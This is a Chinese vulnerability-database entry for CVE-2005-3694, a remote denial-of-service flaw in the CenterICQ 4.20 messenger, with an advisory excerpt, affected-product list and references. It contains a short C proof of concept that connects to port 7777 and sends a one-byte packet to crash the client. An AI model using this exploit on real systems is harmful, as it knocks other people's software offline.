CenterICQ形态异常的数据包处理远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109335 漏洞类型 其他
发布时间 2005-11-29 更新时间 2006-04-11
CVE编号 CVE-2005-3694 CNNVD-ID CNNVD-200511-279
漏洞平台 Linux CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/26666
https://www.securityfocus.com/bid/15649
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-279
|漏洞详情
CenterICQ是一款即时通信软件。设置了"启用对等通讯"的centericq4.20.0-r3,可让远程攻击者通过很短的零长度数据包,也可能是长度为1或2的数据包,使系统拒绝服务(分段错误和崩溃),如使用Nessus所示。
|漏洞EXP
source: http://www.securityfocus.com/bid/15649/info

CenterICQ is prone to a remote denial-of-service vulnerability.

The vulnerability presents itself when the client is running on a computer that is directly connected to the Internet and handles malformed packets on the listening port for ICQ messages.

A successful attack can cause the client to crash. 

#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define DEST_IP   "192.168.1.33"
#define DEST_PORT 7777

    main()
    {
        int sockfd;
        struct sockaddr_in dest_addr;   // will hold the destination addr

        sockfd = socket(AF_INET, SOCK_STREAM, 0); // do some error checking!

        dest_addr.sin_family = AF_INET;          // host byte order
        dest_addr.sin_port = htons(DEST_PORT);   // short, network byte order
        dest_addr.sin_addr.s_addr = inet_addr(DEST_IP);
        memset(&(dest_addr.sin_zero), '\0', 8);  // zero the rest of the struct

        // don't forget to error check the connect()!
        connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr));
	char *msg[] = { 0x01 };
	send(sockfd, msg, 1, 0);
}
|受影响的产品
Gentoo Linux Centericq Centericq 4.20 + Debian Linux 3.1 sparc + Debian Linux 3.1 s/390 + Debian
|参考资料

来源:bugs.gentoo.org
链接:https://bugs.gentoo.org/show_bug.cgi?id=100519
来源:bugs.debian.org
链接:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=334089
来源:XF
名称:centericq-zero-length-dos(23327)
链接:http://xforce.iss.net/xforce/xfdb/23327
来源:BID
名称:15649
链接:http://www.securityfocus.com/bid/15649
来源:OSVDB
名称:21270
链接:http://www.osvdb.org/21270
来源:DEBIAN
名称:DSA-912
链接:http://www.debian.org/security/2005/dsa-912
来源:GENTOO
名称:GLSA-200512-11
链接:http://security.gentoo.org/glsa/glsa-200512-11.xml
来源:SECUNIA
名称:18081
链接:http://secunia.com/advisories/18081
来源:SECUNIA
名称:17818
链接:http://secunia.com/advisories/17818
来源:SECUNIA
名称:17798
链接:http://secunia.com/advisories/17798